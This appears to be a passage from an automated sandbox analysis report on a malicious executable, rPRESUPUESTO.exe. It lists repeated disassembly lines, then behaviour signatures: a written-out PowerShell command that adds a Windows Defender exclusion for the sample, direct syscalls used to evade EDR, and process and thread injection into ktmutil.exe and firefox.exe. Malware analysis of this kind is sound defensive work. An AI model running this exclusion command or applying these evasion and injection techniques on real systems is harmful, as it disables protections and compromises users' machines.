            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0181096E mov edx, dword ptr fs:[00000030h]5_2_0181096E
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0181096E mov eax, dword ptr fs:[00000030h]5_2_0181096E
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0185C97C mov eax, dword ptr fs:[00000030h]5_2_0185C97C
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01874978 mov eax, dword ptr fs:[00000030h]5_2_01874978
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01874978 mov eax, dword ptr fs:[00000030h]5_2_01874978
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0185C89D mov eax, dword ptr fs:[00000030h]5_2_0185C89D
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D4859 mov eax, dword ptr fs:[00000030h]5_2_017D4859
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D4859 mov eax, dword ptr fs:[00000030h]5_2_017D4859
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E2840 mov ecx, dword ptr fs:[00000030h]5_2_017E2840
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017F2835 mov eax, dword ptr fs:[00000030h]5_2_017F2835
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017F2835 mov eax, dword ptr fs:[00000030h]5_2_017F2835
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017F2835 mov eax, dword ptr fs:[00000030h]5_2_017F2835
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017F2835 mov ecx, dword ptr fs:[00000030h]5_2_017F2835
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017F2835 mov eax, dword ptr fs:[00000030h]5_2_017F2835
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017F2835 mov eax, dword ptr fs:[00000030h]5_2_017F2835
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018A08C0 mov eax, dword ptr fs:[00000030h]5_2_018A08C0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0189A8E4 mov eax, dword ptr fs:[00000030h]5_2_0189A8E4
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180C8F9 mov eax, dword ptr fs:[00000030h]5_2_0180C8F9
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180C8F9 mov eax, dword ptr fs:[00000030h]5_2_0180C8F9
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0185C810 mov eax, dword ptr fs:[00000030h]5_2_0185C810
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180A830 mov eax, dword ptr fs:[00000030h]5_2_0180A830
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0187483A mov eax, dword ptr fs:[00000030h]5_2_0187483A
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0187483A mov eax, dword ptr fs:[00000030h]5_2_0187483A
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017FE8C0 mov eax, dword ptr fs:[00000030h]5_2_017FE8C0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01800854 mov eax, dword ptr fs:[00000030h]5_2_01800854
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01866870 mov eax, dword ptr fs:[00000030h]5_2_01866870
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01866870 mov eax, dword ptr fs:[00000030h]5_2_01866870
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0185E872 mov eax, dword ptr fs:[00000030h]5_2_0185E872
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0185E872 mov eax, dword ptr fs:[00000030h]5_2_0185E872
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D0887 mov eax, dword ptr fs:[00000030h]5_2_017D0887
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017CCB7E mov eax, dword ptr fs:[00000030h]5_2_017CCB7E
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017C8B50 mov eax, dword ptr fs:[00000030h]5_2_017C8B50
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01884BB0 mov eax, dword ptr fs:[00000030h]5_2_01884BB0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01884BB0 mov eax, dword ptr fs:[00000030h]5_2_01884BB0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0187EBD0 mov eax, dword ptr fs:[00000030h]5_2_0187EBD0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017FEB20 mov eax, dword ptr fs:[00000030h]5_2_017FEB20
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017FEB20 mov eax, dword ptr fs:[00000030h]5_2_017FEB20
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0185CBF0 mov eax, dword ptr fs:[00000030h]5_2_0185CBF0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017FEBFC mov eax, dword ptr fs:[00000030h]5_2_017FEBFC
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018A4B00 mov eax, dword ptr fs:[00000030h]5_2_018A4B00
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D8BF0 mov eax, dword ptr fs:[00000030h]5_2_017D8BF0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D8BF0 mov eax, dword ptr fs:[00000030h]5_2_017D8BF0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D8BF0 mov eax, dword ptr fs:[00000030h]5_2_017D8BF0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0184EB1D mov eax, dword ptr fs:[00000030h]5_2_0184EB1D
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0184EB1D mov eax, dword ptr fs:[00000030h]5_2_0184EB1D
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0184EB1D mov eax, dword ptr fs:[00000030h]5_2_0184EB1D
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0184EB1D mov eax, dword ptr fs:[00000030h]5_2_0184EB1D
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0184EB1D mov eax, dword ptr fs:[00000030h]5_2_0184EB1D
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0184EB1D mov eax, dword ptr fs:[00000030h]5_2_0184EB1D
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0184EB1D mov eax, dword ptr fs:[00000030h]5_2_0184EB1D
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0184EB1D mov eax, dword ptr fs:[00000030h]5_2_0184EB1D
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0184EB1D mov eax, dword ptr fs:[00000030h]5_2_0184EB1D
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01898B28 mov eax, dword ptr fs:[00000030h]5_2_01898B28
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01898B28 mov eax, dword ptr fs:[00000030h]5_2_01898B28
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D0BCD mov eax, dword ptr fs:[00000030h]5_2_017D0BCD
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D0BCD mov eax, dword ptr fs:[00000030h]5_2_017D0BCD
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D0BCD mov eax, dword ptr fs:[00000030h]5_2_017D0BCD
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017F0BCB mov eax, dword ptr fs:[00000030h]5_2_017F0BCB
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017F0BCB mov eax, dword ptr fs:[00000030h]5_2_017F0BCB
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017F0BCB mov eax, dword ptr fs:[00000030h]5_2_017F0BCB
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E0BBE mov eax, dword ptr fs:[00000030h]5_2_017E0BBE
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E0BBE mov eax, dword ptr fs:[00000030h]5_2_017E0BBE
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01884B4B mov eax, dword ptr fs:[00000030h]5_2_01884B4B
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01884B4B mov eax, dword ptr fs:[00000030h]5_2_01884B4B
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01878B42 mov eax, dword ptr fs:[00000030h]5_2_01878B42
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01866B40 mov eax, dword ptr fs:[00000030h]5_2_01866B40
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01866B40 mov eax, dword ptr fs:[00000030h]5_2_01866B40
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0189AB40 mov eax, dword ptr fs:[00000030h]5_2_0189AB40
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0187EB50 mov eax, dword ptr fs:[00000030h]5_2_0187EB50
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018A2B57 mov eax, dword ptr fs:[00000030h]5_2_018A2B57
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018A2B57 mov eax, dword ptr fs:[00000030h]5_2_018A2B57
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018A2B57 mov eax, dword ptr fs:[00000030h]5_2_018A2B57
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018A2B57 mov eax, dword ptr fs:[00000030h]5_2_018A2B57
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018A4A80 mov eax, dword ptr fs:[00000030h]5_2_018A4A80
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01808A90 mov edx, dword ptr fs:[00000030h]5_2_01808A90
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E0A5B mov eax, dword ptr fs:[00000030h]5_2_017E0A5B
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E0A5B mov eax, dword ptr fs:[00000030h]5_2_017E0A5B
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01826AA4 mov eax, dword ptr fs:[00000030h]5_2_01826AA4
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D6A50 mov eax, dword ptr fs:[00000030h]5_2_017D6A50
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D6A50 mov eax, dword ptr fs:[00000030h]5_2_017D6A50
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D6A50 mov eax, dword ptr fs:[00000030h]5_2_017D6A50
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D6A50 mov eax, dword ptr fs:[00000030h]5_2_017D6A50
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D6A50 mov eax, dword ptr fs:[00000030h]5_2_017D6A50
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D6A50 mov eax, dword ptr fs:[00000030h]5_2_017D6A50
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D6A50 mov eax, dword ptr fs:[00000030h]5_2_017D6A50
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017F4A35 mov eax, dword ptr fs:[00000030h]5_2_017F4A35
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017F4A35 mov eax, dword ptr fs:[00000030h]5_2_017F4A35
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01826ACC mov eax, dword ptr fs:[00000030h]5_2_01826ACC
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01826ACC mov eax, dword ptr fs:[00000030h]5_2_01826ACC
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01826ACC mov eax, dword ptr fs:[00000030h]5_2_01826ACC
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01804AD0 mov eax, dword ptr fs:[00000030h]5_2_01804AD0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01804AD0 mov eax, dword ptr fs:[00000030h]5_2_01804AD0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017FEA2E mov eax, dword ptr fs:[00000030h]5_2_017FEA2E
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180AAEE mov eax, dword ptr fs:[00000030h]5_2_0180AAEE
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180AAEE mov eax, dword ptr fs:[00000030h]5_2_0180AAEE
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0185CA11 mov eax, dword ptr fs:[00000030h]5_2_0185CA11
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180CA24 mov eax, dword ptr fs:[00000030h]5_2_0180CA24
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D0AD0 mov eax, dword ptr fs:[00000030h]5_2_017D0AD0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180CA38 mov eax, dword ptr fs:[00000030h]5_2_0180CA38
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D8AA0 mov eax, dword ptr fs:[00000030h]5_2_017D8AA0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D8AA0 mov eax, dword ptr fs:[00000030h]5_2_017D8AA0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0187EA60 mov eax, dword ptr fs:[00000030h]5_2_0187EA60
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180CA6F mov eax, dword ptr fs:[00000030h]5_2_0180CA6F
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180CA6F mov eax, dword ptr fs:[00000030h]5_2_0180CA6F
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180CA6F mov eax, dword ptr fs:[00000030h]5_2_0180CA6F
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPRESUPUESTO.exe"
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPRESUPUESTO.exe"Jump to behavior
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeNtQueryValueKey: Direct from: 0x76EF2BECJump to behavior
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeNtOpenKeyEx: Direct from: 0x76EF3C9CJump to behavior
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeNtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeMemory written: C:\Users\user\Desktop\rPRESUPUESTO.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeSection loaded: NULL target: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeSection loaded: NULL target: C:\Windows\SysWOW64\ktmutil.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: NULL target: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: NULL target: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\ktmutil.exeThread register set: target process: 4268Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\ktmutil.exeThread APC queued: target process: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPRESUPUESTO.exe"Jump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess created: C:\Users\user\Desktop\rPRESUPUESTO.exe "C:\Users\user\Desktop\rPRESUPUESTO.exe"Jump to behavior
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeProcess created: C:\Windows\SysWOW64\ktmutil.exe "C:\Windows\SysWOW64\ktmutil.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: MqDMLUHvZmSMqiwTfIsHo.exe, 00000008.00000002.4587906906.0000000001761000.00000002.00000001.00040000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 00000008.00000000.2251522914.0000000001761000.00000002.00000001.00040000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588158664.00000000018B1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: MqDMLUHvZmSMqiwTfIsHo.exe, 00000008.00000002.4587906906.0000000001761000.00000002.00000001.00040000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 00000008.00000000.2251522914.0000000001761000.00000002.00000001.00040000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588158664.00000000018B1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: MqDMLUHvZmSMqiwTfIsHo.exe, 00000008.00000002.4587906906.0000000001761000.00000002.00000001.00040000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 00000008.00000000.2251522914.0000000001761000.00000002.00000001.00040000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588158664.00000000018B1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: MqDMLUHvZmSMqiwTfIsHo.exe, 00000008.00000002.4587906906.0000000001761000.00000002.00000001.00040000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 00000008.00000000.2251522914.0000000001761000.00000002.00000001.00040000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588158664.00000000018B1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeQueries volume information: C:\Users\user\Desktop\rPRESUPUESTO.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
